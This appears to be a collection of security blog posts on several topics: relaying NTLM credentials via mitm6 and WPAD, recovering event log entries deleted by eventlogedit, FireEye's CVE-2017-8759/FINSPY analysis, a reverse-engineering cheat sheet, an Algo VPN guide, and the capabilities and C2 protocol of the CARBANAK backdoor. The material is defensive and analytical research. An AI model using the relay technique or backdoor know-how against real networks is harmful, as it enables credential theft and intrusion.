In 2016 however, Microsoft published a security bulletin MS16-077, which mitigated this attack by adding two important protections:
– The location of the WPAD file is no longer requested via broadcast protocols, but only via DNS.
– Authentication does not occur automatically anymore even if this is requested by the server.

While it is common to encounter machines in networks that are not fully patched and are still displaying the old behaviour of requesting WPAD via LLMNR and automatically authenticating, we come across more and more companies where exploiting WPAD the old-fashioned way does not work anymore.

Exploiting WPAD post MS16-077

The first protection, where WPAD is only requested via DNS, can be easily bypassed with mitm6. As soon as the victim machine has set the attacker as IPv6 DNS server, it will start querying for the WPAD configuration of the network. Since these DNS queries are sent to the attacker, it can just reply with its own IP address (either IPv4 or IPv6 depending on what the victim’s machine asks for). This also works if the organization is already using a WPAD file (though in this case it will break any connections from reaching the internet).

To bypass the second protection, where credentials are no longer provided by default, we need to do a little more work. When the victim requests a WPAD file we won’t request authentication, but instead provide it with a valid WPAD file where the attacker’s machine is set as a proxy. When the victim now runs any application that uses the Windows API to connect to the internet or simply starts browsing the web, it will use the attackers machine as a proxy. This works in Edge, Internet Explorer, Firefox and Chrome, since they all respect the WPAD system settings by default.
Now when the victim connects to our “proxy” server, which we can identify by the use of the CONNECT HTTP verb, or the presence of a full URI after the GET verb, we reply with a HTTP 407 Proxy Authentication required. This is different from the HTTP code normally used to request authentication, HTTP 401.
IE/Edge and Chrome (which uses IEs settings) will automatically authenticate to the proxy, even on the latest Windows versions. In Firefox this setting can be configured, but it is enabled by default.


Windows will now happily send the NTLM challenge/response to the attacker, who can relay it to different services. With this relaying attack, the attacker can authenticate as the victim on services, access information on websites and shares, and if the victim has enough privileges, the attacker can even execute code on computers or even take over the entire Windows Domain. Some of the possibilities of NTLM relaying were explained in one of our previous blogs, which can be found here.

The full attack

The previous sections described the global idea behind the attack. Running the attack itself is quite straightforward. First we start mitm6, which will start replying to DHCPv6 requests and afterwards to DNS queries requesting names in the internal network. For the second part of our attack, we use our favorite relaying tool, ntlmrelayx. This tool is part of the impacket Python library by Core Security and is an improvement on the well-known smbrelayx tool, supporting several protocols to relay to. Core Security and Fox-IT recently worked together on improving ntlmrelayx, adding several new features which (among others) enable it to relay via IPv6, serve the WPAD file, automatically detect proxy requests and prompt the victim for the correct authentication. If you want to check out some of the new features, have a look at the relay-experimental branch.

To serve the WPAD file, all we need to add to the command prompt is the host is the -wh parameter and with it specify the host that the WPAD file resides on. Since mitm6 gives us control over the DNS, any non-existing hostname in the victim network will do. To make sure ntlmrelayx listens on both IPv4 and IPv6, use the -6 parameter. The screenshots below show both tools in action, mitm6 selectively spoofing DNS replies and ntlmrelayx serving the WPAD file and then relaying authentication to other servers in the network.


Defenses and mitigations

The only defense against this attack that we are currently aware of is disabling IPv6 if it is not used on your internal network. This will stop Windows clients querying for a DHCPv6 server and make it impossible to take over the DNS server with the above described method.
For the WPAD exploit, the best solution is to disable the Proxy Auto detection via Group Policy. If your company uses a proxy configuration file internally (PAC file) it is recommended to explicitly configure the PAC url instead of relying on WPAD to detect it automatically.
While writing this blog, Google Project Zero also discovered vulnerabilities in WPAD, and their blog post mentions that disabling the WinHttpAutoProxySvc is the only reliable way that in their experience disabled WPAD.

Lastly, the only complete solution to prevent NTLM relaying is to disable it entirely and switch to Kerberos. If this is not possible, our last blog post on NTLM relaying mentions several mitigations to minimize the risk of relaying attacks.


The Fox-IT Security Research Team team has released Snort and Suricata signatures to detect rogue DHCPv6 traffic and WPAD replies over IPv6:

Where to get the tools

mitm6 is available from the Fox-IT GitHub. The updated version of ntlmrelayx is available from the impacket repository.

Detection and recovery of NSA’s covered up tracks

Part of the NSA cyber weapon framework DanderSpritz is eventlogedit, a piece of software capable of removing individual lines from Windows Event Log files. Now that this tool is leaked and public, any criminal willing to remove its traces on a hacked computer can use it. Fox-IT has looked at the software and found a unique way to detect the use of it and to recover the removed event log entries.


A group known as The Shadow Brokers published a collection of software, which allegedly was part of the cyber weapon arsenal of the NSA. Part of the published software was the exploitation framework FuzzBunch and post-exploitation framework DanderSpritz. DanderSpritz is a full-blown command and control server, or listening post in NSA terms. It can be used to stealthy perform various actions on hacked computers, like finding and exfiltrating data or move laterally through the target network. Its GUI is built on Java and contains plugins written in Python. The plugins contain functionality in the framework to perform specific actions on the target machine. One specific plugin in DanderSpritz caught the eye of the Forensics & Incident Response team at Fox-IT: eventlogedit.

DanderSpritz with eventlogedit in action

Figure 1: DanderSpritz with eventlogedit in action


Normally, the content of Windows Event Log files is useful for system administrators troubleshooting system performance, security teams monitoring for incidents, and forensic and incident response teams investigating a breach or fraud case. A single event record can alert the security team or be the smoking gun during an investigation. Various other artefacts found on the target system usually corroborate findings in Windows Event Log files during an investigation, but a missing event record could reduce the chances of detection of an attack, or impede investigation.

Fox-IT has encountered event log editing by attackers before, but eventlogedit appeared to be more sophisticated. Investigative methods able to spot other methods of event log manipulation were not able to show indicators of edited log files after the use of eventlogedit. Using eventlogedit, an attacker is able to remove individual event log entries from the Security, Application and System log on a target Windows system. After forensic analysis of systems where eventlogedit was used, the Forensics & Incident Response team of Fox-IT was able to create a Python script to detect the use of eventlogedit and fully recover the removed event log entries by the attacker.

Analysing recovered event records, deleted by an attacker, gives great insight into what an attacker wanted to hide and ultimately wanted to achieve. This provides security and response teams with more prevention and detection possibilities, and investigative leads during an investigation.

Before (back) and after (front) eventlogedit

Figure 2: Before (back) and after (front) eventlogedit

eventlogedit in use

Starting with Windows Vista, Windows Event Log files are stored in the Windows XML Eventlog format. The files on the disk have the file extension .evtx and are stored in the folder \Windows\System32\winevt\Logs\ on the system disk, by default. The file structure consists of a file header followed by one or more chunks. A chunk itself starts with a header followed by one or more individual event records. The event record starts with a signature, followed by record size, record number, timestamp, the actual event message, and the record size once again. The event message is encoded in a proprietary binary XML format, binXml. BinXml is a token representation of text XML.

Fox-IT discovered that when eventlogedit is used, the to-be-removed event record itself isn’t edited or removed at all: the record is only unreferenced. This is achieved by manipulation of the record header of the preceding record. Eventlogedit adds the size of the to-be-removed-record to the size of the previous record, thereby merging the two records. The removed record including its record header is now simply seen as excess data of the preceding record. In Figure 3 this is illustrated. You might think that an event viewer would show this excess or garbage data, but no. Apparently, all tested viewers parse the record binXml message data until the first end-tag and then move on to the next record. Tested viewers include Windows Event Viewer as well as various other forensic event log viewers and parsers. None of them was able to show a removed record.

Untouched event records (left) and deleted event record (right)

Figure 3: Untouched event records (left) and deleted event record (right). Note: not all field are displayed here.

Merely changing the record size would not be enough to prevent detection: various fields in the file and chunk header need to be changed. Eventlogedit makes sure that all following event records numbers are renumbered and that checksums are recalculated in both the file and chunk header. Doing so, it makes sure that obvious anomalies like missing record numbers or checksum errors are prevented and will not raise an alarm at the system user, or the security department.

Organizations which send event log records on the fly to a central log server (e.g. a SIEM), should be able to see the removed record on their server. However, an advanced attacker will most likely compromise the log server before continuing the operation on the target computer.

Recovering removed records

As eventlogedit leaves the removed record and record header in its original state, their content can be recovered. This allows the full recovery of all the data that was originally in the record, including record number, event id, timestamps, and event message.

Fox-IT’s Forensics & Incident Response department has created a Python script that finds and exports any removed event log records from an event log file. This script also works in the scenario when consecutive event records have been removed, when the first record of the file is removed, or the first record of a chunk is removed. In Figure 4 an example is shown.

Recovering removed event records

Figure 4: Recovering removed event records

We have decided to open source the script. It can be found on our GitHub and works like this:

$ python -h
usage: [-h] -i INPUT_PATH [-o OUTPUT_PATH]
 [-e EXPORT_PATH] - Parse evtx files and detect the use of the danderspritz
module that deletes evtx entries

optional arguments:
 -h, --help show this help message and exit
 Path to evtx file
 Path to corrected evtx file
 Path to location to store exported xml records

The script requires the python-evtx library from Willi Ballenthin.

Additionally, we have created an easy to use standalone executable for Windows systems which can be found on our GitHub as well.


md5    c07f6a5b27e6db7b43a84c724a2f61be 
sha1   6d10d80cb8643d780d0f1fa84891a2447f34627c
sha256 6c0f3cd832871ba4eb0ac93e241811fd982f1804d8009d1e50af948858d75f6b



To detect if the NSA or someone else has used this to cover up his tracks using the eventlogedit tool on your systems, it is recommended to use the script on event log files from your Windows servers and computers. As the NSA very likely changed their tools after the leaks, it might be farfetched to detect their current operations with this script. But you might find traces of it in older event log files. It is recommended to run the script on archived event log files from back-ups or central log servers.

If you find traces of eventlogedit, and would like assistance in analysis and remediation for a possible breach, feel free to contact us. Our Forensics & Incident Response department during business hours or FoxCERT 24/7.

Wouter Jansen
Fox-IT Forensics & Incident Response

Hybrid Analysis Grows Up – Acquired by CrowdStrike

CrowdStrike acquired Payload Security, the company behind the automated malware analysis sandbox technology Hybrid Analysis, in November 2017. Jan Miller founded Payload Security approximately 3 years earlier. The interview I conducted with Jan in early 2015 captured his mindset at the onset of the journey that led to this milestone. I briefly spoke with Jan again, a few days after the acquisition. He reflected upon his progress over the three years of leading Payload Security so far and his plans for Hybrid Analysis as part of CrowdStrike.

Jan, why did you and your team decide to join CrowdStrike?

Developing a malware analysis product requires a constant stream of improvements to the technology, not only to keep up with the pace of malware authors’ attempts to evade automated analysis but also innovate and embrace the community. The team has accomplished a lot thus far, but joining CrowdStrike gives us the ability to access a lot more resources and grow the team to rapidly improve Hybrid Analysis in the competitive space that we live in. We will have the ability to bring more people into the team and also enhance and grow the infrastructure and integrations behind the free Hybrid Analysis community platform.

What role did the free version of your product, available at, play in the company’s evolution?

A lot of people in the community have been using the free version of Hybrid Analysis to analyze their own malware samples, share them with friends or to look-up existing analysis reports and extract intelligence. Today, the site has approximately 44,000 active users and around 1 million sessions per month. One of the reasons the site took off is the simplicity and quality of the reports, focusing on what matters and enabling effective incident response.

The success of Hybrid Analysis was, to a large extent, due to the engagement from the community. The samples we have been receiving allowed us to constantly field-test the system against the latest malware, stay on top of the game and also to embrace feedback from security professionals. This allowed us to keep improving at rapid pace in a competitive space, successfully.

What will happen to the free version of Hybrid Analysis? I saw on Twitter that your team pinky-promised to continue making it available for free to the community, but I was hoping you could comment further on this.

I’m personally committed to ensuring that the community platform will stay not only free, but grow even more useful and offer new capabilities shortly. Hybrid Analysis deserves to be the place for professionals to get a reasoned opinion about any binary they’ve encountered. We plan to open up the API, add more integrations and other free capabilities in the near future.

What stands out in your mind as you reflect upon your Hybrid Analysis journey so far? What’s motivating you to move forward?

Starting out without any noteworthy funding, co-founders or advisors, in a saturated high-tech market that is extremely fast paced and full of money, it seemed impossible to succeed on paper. But the reality is: if you are offering a product or service that is solving a real-world problem considerably better than the market leaders, you always have a chance. My hope is that people who are considering becoming entrepreneurs will be encouraged to pursue their ideas, but be prepared to work 80 hours a week, have the right technology, the feedback from the community, amazing team members and lean on insightful advisors and you can make it happen.

In fact, it’s because of the value Hybrid Analysis has been adding to the community that I was able to attract the highly talented individuals that are currently on the team. It has always been important for me to make a difference, to contribute something and have a true impact on people’s lives. It all boils down to bringing more light than darkness into the world, as cheesy as that might sound.

FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY

FireEye recently detected a malicious Microsoft Office RTF document that leveraged CVE-2017-8759, a SOAP WSDL parser code injection vulnerability. This vulnerability allows a malicious actor to inject arbitrary code during the parsing of SOAP WSDL definition contents. FireEye analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands.

FireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch to address the vulnerability and security guidance, which can be found here.

FireEye email, endpoint and network products detected the malicious documents.

Vulnerability Used to Target Russian Speakers

The malicious document, “Проект.doc” (MD5: fe5c4d6bb78e170abf5cf3741868ea4c), might have been used to target a Russian speaker. Upon successful exploitation of CVE-2017-8759, the document downloads multiple components (details follow), and eventually launches a FINSPY payload (MD5: a7b990d5f57b244dd17e9a937a41e7f5).

FINSPY malware, also reported as FinFisher or WingBird, is available for purchase as part of a “lawful intercept” capability. Based on this and previous use of FINSPY, we assess with moderate confidence that this malicious document was used by a nation-state to target a Russian-speaking entity for cyber espionage purposes. Additional detections by FireEye’s Dynamic Threat Intelligence system indicates that related activity, though potentially for a different client, might have occurred as early as July 2017.

CVE-2017-8759 WSDL Parser Code Injection

A code injection vulnerability exists in the WSDL parser module within the PrintClientProxy method ( - System.Runtime.Remoting/metadata/wsdlparser.cs,6111). The IsValidUrl does not perform correct validation if provided data that contains a CRLF sequence. This allows an attacker to inject and execute arbitrary code. A portion of the vulnerable code is shown in Figure 1.

Figure 1: Vulnerable WSDL Parser

When multiple address definitions are provided in a SOAP response, the code inserts the “//base.ConfigureProxy(this.GetType(),” string after the first address, commenting out the remaining addresses. However, if a CRLF sequence is in the additional addresses, the code following the CRLF will not be commented out. Figure 2 shows that due to lack validation of CRLF, a System.Diagnostics.Process.Start method call is injected. The generated code will be compiled by csc.exe of .NET framework, and loaded by the Office executables as a DLL.

Figure 2: SOAP definition VS Generated code

The In-the-Wild Attacks

The attacks that FireEye observed in the wild leveraged a Rich Text Format (RTF) document, similar to the CVE-2017-0199 documents we previously reported on. The malicious sampled contained an embedded SOAP monikers to facilitate exploitation (Figure 3).

Figure 3: SOAP Moniker

The payload retrieves the malicious SOAP WSDL definition from an attacker-controlled server. The WSDL parser, implemented in of .NET framework, parses the content and generates a .cs source code at the working directory. The csc.exe of .NET framework then compiles the generated source code into a library, namely http[url path].dll. Microsoft Office then loads the library, completing the exploitation stage.  Figure 4 shows an example library loaded as a result of exploitation.

Figure 4: DLL loaded

Upon successful exploitation, the injected code creates a new process and leverages mshta.exe to retrieve a HTA script named “word.db” from the same server. The HTA script removes the source code, compiled DLL and the PDB files from disk and then downloads and executes the FINSPY malware named “left.jpg,” which in spite of the .jpg extension and “image/jpeg” content-type, is actually an executable. Figure 5 shows the details of the PCAP of this malware transfer.

Figure 5: Live requests

The malware will be placed at %appdata%\Microsoft\Windows\OfficeUpdte-KB[ 6 random numbers ].exe. Figure 6 shows the process create chain under Process Monitor.

Figure 6: Process Created Chain

The Malware

The “left.jpg” (md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant of FINSPY. It leverages heavily obfuscated code that employs a built-in virtual machine – among other anti-analysis techniques – to make reversing more difficult. As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames. This variant runs with a mutex of "WininetStartupMutex0".


CVE-2017-8759 is the second zero-day vulnerability used to distribute FINSPY uncovered by FireEye in 2017. These exposures demonstrate the significant resources available to “lawful intercept” companies and their customers. Furthermore, FINSPY has been sold to multiple clients, suggesting the vulnerability was being used against other targets.

It is possible that CVE-2017-8759 was being used by additional actors. While we have not found evidence of this, the zero day being used to distribute FINSPY in April 2017, CVE-2017-0199 was simultaneously being used by a financially motivated actor. If the actors behind FINSPY obtained this vulnerability from the same source used previously, it is possible that source sold it to additional actors.


Thank you to Dhanesh Kizhakkinan, Joseph Reyes, FireEye Labs Team, FireEye FLARE Team and FireEye iSIGHT Intelligence for their contributions to this blog. We also thank everyone from the Microsoft Security Response Center (MSRC) who worked with us on this issue.

Tips for Reverse-Engineering Malicious Code

This cheat sheet outlines tips for reversing malicious Windows executables via static and dynamic code analysis with the help of a debugger and a disassembler. To print it, use the one-page PDF version; you can also edit the Word version to customize it for you own needs.

Overview of the Code Analysis Process

  1. Examine static properties of the Windows executable for initial assessment and triage.
  2. Identify strings and API calls that highlight the program’s suspicious or malicious capabilities.
  3. Perform automated and manual behavioral analysis to gather additional details.
  4. If relevant, supplement our understanding by using memory forensics techniques.
  5. Use a disassembler for static analysis to examine code that references risky strings and API calls.
  6. Use a debugger for dynamic analysis to examine how risky strings and API calls are used.
  7. If appropriate, unpack the code and its artifacts.
  8. As your understanding of the code increases, add comments, labels; rename functions, variables.
  9. Progress to examine the code that references or depends upon the code you’ve already analyzed.
  10. Repeat steps 5-9 above as necessary (the order may vary) until analysis objectives are met.

Common 32-Bit Registers and Uses

EAX Addition, multiplication, function results
ECX Counter; used by LOOP and others
EBP Baseline/frame pointer for referencing function arguments (EBP+value) and local variables (EBP-value)
ESP Points to the current “top” of the stack; changes via PUSH, POP, and others
EIP Instruction pointer; points to the next instruction; shellcode gets it via call/pop
EFLAGS Contains flags that store outcomes of computations (e.g., Zero and Carry flags)
FS F segment register; FS[0] points to SEH chain, FS[0x30] points to the PEB.

Common x86 Assembly Instructions

mov EAX,0xB8 Put the value 0xB8 in EAX.
push EAX Put EAX contents on the stack.
pop EAX Remove contents from top of the stack and put them in EAX .
lea EAX,[EBP-4] Put the address of variable EBP-4 in EAX.
call EAX Call the function whose address resides in the EAX register.
add esp,8 Increase ESP by 8 to shrink the stack by two 4-byte arguments.
sub esp,0x54 Shift ESP by 0x54 to make room on the stack for local variable(s).
xor EAX,EAX Set EAX contents to zero.
test EAX,EAX Check whether EAX contains zero, set the appropriate EFLAGS bits.
cmp EAX,0xB8 Compare EAX to 0xB8, set the appropriate EFLAGS bits.

Understanding 64-Bit Registers

  • Additional 64-bit registers are R8-R15.
  • RSP is often used to access stack arguments and local variables, instead of EBP.
  • |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| R8 (64 bits)
    ________________________________|||||||||||||||||||||||||||||||| R8D (32 bits)
    ________________________________________________|||||||||||||||| R8W (16 bits)
    ________________________________________________________|||||||| R8B (8 bits)

Passing Parameters to Functions

arg0 [EBP+8] on 32-bit, RCX on 64-bit
arg1 [EBP+0xC] on 32-bit, RDX on 64-bit
arg2 [EBP+0x10] on 32-bit, R8 on 64-bit
arg3 [EBP+14] on 32-bit, R9 on 64-bit

Decoding Conditional Jumps

JA / JG Jump if above/jump if greater.
JB / JL Jump if below/jump if less.
JE / JZ Jump if equal; same as jump if zero.
JNE / JNZ Jump if not equal; same as jump if not zero.
JGE/ JNL Jump if greater or equal; same as jump if not less.

Some Risky Windows API Calls

  • Code injection: CreateRemoteThread, OpenProcess, VirtualAllocEx, WriteProcessMemory, EnumProcesses
  • Dynamic DLL loading: LoadLibrary, GetProcAddress
  • Memory scraping: CreateToolhelp32Snapshot, OpenProcess, ReadProcessMemory, EnumProcesses
  • Data stealing: GetClipboardData, GetWindowText
  • Keylogging: GetAsyncKeyState, SetWindowsHookEx
  • Embedded resources: FindResource, LockResource
  • Unpacking/self-injection: VirtualAlloc, VirtualProtect
  • Query artifacts: CreateMutex, CreateFile, FindWindow, GetModuleHandle, RegOpenKeyEx
  • Execute a program: WinExec, ShellExecute, CreateProcess
  • Web interactions: InternetOpen, HttpOpenRequest, HttpSendRequest, InternetReadFile

Additional Code Analysis Tips

  • Be patient but persistent; focus on small, manageable code areas and expand from there.
  • Use dynamic code analysis (debugging) for code that’s too difficult to understand statically.
  • Look at jumps and calls to assess how the specimen flows from “interesting” code block to the other.
  • If code analysis is taking too long, consider whether behavioral or memory analysis will achieve the goals.
  • When looking for API calls, know the official API names and the associated native APIs (Nt, Zw, Rtl).


Authored by Lenny Zeltser with feedback from Anuj Soni. Malicious code analysis and related topics are covered in the SANS Institute course FOR610: Reverse-Engineering Malware, which they’ve co-authored. This cheat sheet, version 1.0, is released under the Creative Commons v3 “Attribution” License.

How to Deploy Your Own Algo VPN Server in the DigitalOcean Cloud

When performing security research or connecting over untrusted networks, it’s often useful to tunnel connections through a VPN in a public cloud. This approach helps conceal your origin and safeguard your traffic, contributing to OPSEC when interacting with malicious infrastructure or traversing hostile environments. Moreover, by using VPN exit nodes in different cities and even countries, the researcher can explore the target from multiple geographic vantage points, which sometimes yields additional findings.

One way to accomplish this is to set up your own VPN server in a public cloud, as an alternative to relying on a commercial VPN service. The following tutorial explains how to deploy the Algo VPN software bundle on DigitalOcean (the link includes my referral code). I like using DigitalOcean for this purpose because it offers virtual private server instances for as little as $5 per month; also, I find it easier to use than AWS.

Algo VPN Overview

Algo VPN is an open source software bundle designed for self-hosted IPSec VPN services. It was designed by the folks at Trail of Bits to be easy to deploy, rely only on modern protocols and ciphers and provide reasonable security defaults. Also, it doesn’t require dedicated VPN client software for connecting from most systems and devices, because of native IPSec support.

To understand why its creators believe Algo VPN is a better alternative to commercial VPNs, the Streisand VPN bundle and OpenVPN, read the blog post that announced Algo’s initial release.  As outlined in the post, Algo VPN is meant “to be easy to set up. That way, you start it when you need it, and tear it down before anyone can figure out the service you’re routing your traffic through.”

Creating a DigitalOcean Virtual Private Server

To obtain an Internet-accessible system where you’ll install Algo VPN server software, you can create a “droplet” on DigitalOcean running Ubuntu with a few clicks. Do do that, click the dropdown button below the Ubuntu icon on the DigitalOcean “Create Droplets” page, then select the 18.04 option, as shown below. (Don’t use 16.04 due to a possible DNS issue.)

Accepting default options for the droplet should be OK in most cases. If you’re not planning to tunnel a lot of traffic through the system, selecting the least expensive size will probably suffice. Select the geographic region where the Virtual Private Server will run based on your requirements. Assign a hostname that appeals to you.

Once the new host is active, make a note of the public IP address that DigitalOccean assigns to it and log into it using SSH. Then run the following commands inside the new virtual private server to update its OS and install Algo VPN core prerequisites:

apt-add-repository -y ppa:ansible/ansible
apt-get update -y
apt-get upgrade -y
apt-get install -y build-essential \
  libssl-dev \
  libffi-dev \
  python-dev \
  python-pip \
  python-setuptools \

At this point you could harden the configuration of the virtual private server, but these steps are outside the scope of this guide.

Installing Algo VPN Server Software

Next, obtain the latest Algo VPN server software on the newly-setup droplet and prepare for the installation by executing the following commands:

git clone
cd algo
python -m virtualenv env
source env/bin/activate
python -m pip install -U pip
python -m pip install -r requirements.txt

Set up the username for the people who will be using the VPN. To accomplish this, use your favorite text editor, such as Nano or Vim to edit the config.cfg file in the ~/algo directory:

vim config.cfg

Remove the lines that represent the default users “dan” and “jack” and add your own (e.g., “john”), so that the corresponding section of the file looks like this:

 - john

After saving the file and exiting the text editor, execute the following command in the ~/algo directory to install Algo software:


When prompted by the installer, select the option to install “to existing Ubuntu 16.04 server”. Note that you’ll be selecting “16.04” even thought you’re actually installing Algo VPN on Ubuntu version 18.04.

When proceeding with the installer, you should be OK  in most cases by accepting default answers with a few exceptions:

  • When asked about the public IP address of the server, enter the IP address assigned to the virtual private server by DigitalOcean when you created the droplet.
  • If planning to VPN from Windows 10 or Linux desktop client systems, answer “Y” to the corresponding question.

After providing the answers, give the installer a few minutes to complete its tasks. (Be patient.) Once it finishes, you’ll see the “Congratulations!” message, stating that your Algo VPN server is running.

Be sure to capture the “p12 and SSH keys password for new users” that the installer will display at the end as part of the congratulatory message, because you will need to use it later. Store it in a safe place, such as your password vault.

Configuring VPN Clients

Once you’ve set up the Alog VPN service, follow the instructions on the Algo VPN website to configure your VPN client. The steps are different for each OS. Fortunately, the Algo setup process generates files that allow you to accomplish this with relative ease. It stores the files in under ~/algo/configs in a subdirectory whose name matches your server’s IP address.

For instance, to configure your iOS device, transfer your user’s Apple Profile file that has the .mobileconfig extension (e.g., john.mobileconfig) to the device, then open the file to install it. Once this is done, you can go to Settings > VPN on your iOS device to enable the VPN when you wish to use it. If at some point you wish to delete this VPN profile, go to General > Profile.

If setting up the VPN client on Windows 10, retrieve from the Algo VPN server your user’s file with the .ps1 extension (e.g., windows_john.ps1). Then, open the Administrator shell on the Windows system and execute the following command from the folder where you’ve placed these files, adjusting the file name to match your name:

powershell -ExecutionPolicy ByPass -File windows_john.ps1 -Add

When prompted, supply the  p12 password that the Algo VPN installer displayed at the end of the installation. This will import the appropriate certificate information and create the VPN connection entry. To connect to the VPN server, go to Settings > Network & Internet > VPN. If you wish to remove the VPN entry, use the PowerShell command above, replacing “-Add” with “-Remove”.

Additional Considerations for Algo VPN

Before relying on VPN to safeguard your interactions with malicious infrastructure, be sure to confirm that it’s concealing the necessary aspects of your origin. If it’s working properly, the remote host should see the IP address of your VPN servers, instead of the IP address of your VPN client. Similarly, your DNS traffic should be getting directed through the VPN tunnel, concealing your client’s locally-configured DNS server. One way to validate this is to use, comparing what information the site reveals before and after you activate your VPN connection. Also, confirm that you’re not leaking your origin over IPv6; one way to do that is by connecting to

You can turn off the virtual private server when you don’t need it. When you boot it up again, Algo VPN software will automatically launch in the background. If running the server for longer periods of time, you should implement security measures necessary appropriate for Internet-connected infrastructure.

As you use your Algo VPN server, adversaries might begin tracking the server’s IP address and eventually blacklist it. Therefore, it’s a good idea to periodically destroy this DigitalOcean droplet and create a new one from scratch. This will not only change the server’s IP address, but also ensure that you’re running the latest version of VPN software and its dependencies. Unfortunately, after you do this, you’ll need to reimport VPN client profiles to match the new server’s IP address and certificate details.

Behind the CARBANAK Backdoor

In this blog, we will take a closer look at the powerful, versatile backdoor known as CARBANAK (aka Anunak). Specifically, we will focus on the operational details of its use over the past few years, including its configuration, the minor variations observed from sample to sample, and its evolution. With these details, we will then draw some conclusions about the operators of CARBANAK. For some additional background on the CARBANAK backdoor, see the papers by Kaspersky and Group-IB and Fox-It.

Technical Analysis

Before we dive into the meat of this blog, a brief technical analysis of the backdoor is necessary to provide some context. CARBANAK is a full-featured backdoor with data-stealing capabilities and a plugin architecture. Some of its capabilities include key logging, desktop video capture, VNC, HTTP form grabbing, file system management, file transfer, TCP tunneling, HTTP proxy, OS destruction, POS and Outlook data theft and reverse shell. Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time.

Monitoring Threads

The backdoor may optionally start one or more threads that perform continuous monitoring for various purposes, as described in Table 1.  

Thread Name


Key logger

Logs key strokes for configured processes and sends them to the command and control (C2) server

Form grabber

Monitors HTTP traffic for form data and sends it to the C2 server

POS monitor

Monitors for changes to logs stored in C:\NSB\Coalition\Logs and nsb.pos.client.log and sends parsed data to the C2 server

PST monitor

Searches recursively for newly created Outlook personal storage table (PST) files within user directories and sends them to the C2 server

HTTP proxy monitor

Monitors HTTP traffic for requests sent to HTTP proxies, saves the proxy address and credentials for future use

Table 1: Monitoring threads


In addition to its file management capabilities, this data-stealing backdoor supports 34 commands that can be received from the C2 server. After decryption, these 34 commands are plain text with parameters that are space delimited much like a command line. The command and parameter names are hashed before being compared by the binary, making it difficult to recover the original names of commands and parameters. Table 2 lists these commands.

Command Hash

Command Name




Runs each command specified in the configuration file (see the Configuration section).



Updates the state value (see the Configuration section).



Desktop video recording



Downloads executable and injects into new process



Ammyy Admin tool



Updates self



Add/Update klgconfig (analysis incomplete)



Starts HTTP proxy



Renders computer unbootable by wiping the MBR



Reboots the operating system



Creates a network tunnel



Adds new C2 server or proxy address for pseudo-HTTP protocol



Adds new C2 server for custom binary protocol



Creates or deletes Windows user account



Enables concurrent RDP (analysis incomplete)



Adds Notification Package (analysis incomplete)



Deletes file or service



Adds command to the configuration file (see the Configuration section)



Downloads executable and injects directly into new process



Send Windows accounts details to the C2 server



Takes a screenshot of the desktop and sends it to the C2 server



Backdoor sleeps until specified date






Upload files to the C2 server



Runs VNC plugin



Runs specified executable file



Uninstalls backdoor



Returns list of running processes to the C2 server



Change C2 protocol used by plugins



Download and execute shellcode from specified address



Terminates the first process found specified by name



Initiates a reverse shell to the C2 server



Plugin control



Updates backdoor

Table 2: Supported Commands


A configuration file resides in a file under the backdoor’s installation directory with the .bin extension. It contains commands in the same form as those listed in Table 2 that are automatically executed by the backdoor when it is started. These commands are also executed when the loadconfig command is issued. This file can be likened to a startup script for the backdoor. The state command sets a global variable containing a series of Boolean values represented as ASCII values ‘0’ or ‘1’ and also adds itself to the configuration file. Some of these values indicate which C2 protocol to use, whether the backdoor has been installed, and whether the PST monitoring thread is running or not. Other than the state command, all commands in the configuration file are identified by their hash’s decimal value instead of their plain text name. Certain commands, when executed, add themselves to the configuration so they will persist across (or be part of) reboots. The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it.

Figure 1 and Figure 2 illustrate some sample, decoded configuration files we have come across in our investigations.

Figure 1: Configuration file that adds new C2 server and forces the data-stealing backdoor to use it

Figure 2: Configuration file that adds TCP tunnels and records desktop video

Command and Control

CARBANAK communicates to its C2 servers via pseudo-HTTP or a custom binary protocol.

Pseudo-HTTP Protocol

Messages for the pseudo-HTTP protocol are delimited with the ‘|’ character. A message starts with a host ID composed by concatenating a hash value generated from the computer’s hostname and MAC address to a string likely used as a campaign code. Once the message has been formatted, it is sandwiched between an additional two fields of randomly generated strings of upper and lower case alphabet characters. An example of a command polling message and a response to the listprocess command are given in Figure 3 and Figure 4, respectively.

Figure 3: Example command polling message

Figure 4: Example command response message

Messages are encrypted using Microsoft’s implementation of RC2 in CBC mode with PKCS#5 padding. The encrypted message is then Base64 encoded, replacing all the ‘/’ and ‘+’ characters with the ‘.’ and ‘-’ characters, respectively. The eight-byte initialization vector (IV) is a randomly generated string consisting of upper and lower case alphabet characters. It is prepended to the encrypted and encoded message.

The encoded payload is then made to look like a URI by having a random number of ‘/’ characters inserted at random locations within the encoded payload. The malware then appends a script extension (php, bml, or cgi) with a random number of random parameters or a file extension from the following list with no parameters: gif, jpg, png, htm, html, php.

This URI is then used in a GET or POST request. The body of the POST request may contain files contained in the cabinet format. A sample GET request is shown in Figure 5.

Figure 5: Sample pseudo-HTTP beacon

The pseudo-HTTP protocol uses any proxies discovered by the HTTP proxy monitoring thread or added by the adminka command. The backdoor also searches for proxy configurations to use in the registry at HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings and for each profile in the Mozilla Firefox configuration file at %AppData%\Mozilla\Firefox\<ProfileName>\prefs.js.

Custom Binary Protocol

Figure 6 describes the structure of the malware’s custom binary protocol. If a message is larger than 150 bytes, it is compressed with an unidentified algorithm. If a message is larger than 4096 bytes, it is broken into compressed chunks. This protocol has undergone several changes over the years, each version building upon the previous version in some way. These changes were likely introduced to render existing network signatures ineffective and to make signature creation more difficult.

Figure 6: Binary protocol message format

Version 1

In the earliest version of the binary protocol, we have discovered that the message bodies that are stored in the <chunkData> field are simply XORed with the host ID. The initial message is not encrypted and contains the host ID.

Version 2

Rather than using the host ID as the key, this version uses a random XOR key between 32 and 64 bytes in length that is generated for each session. This key is sent in the initial message.

Version 3

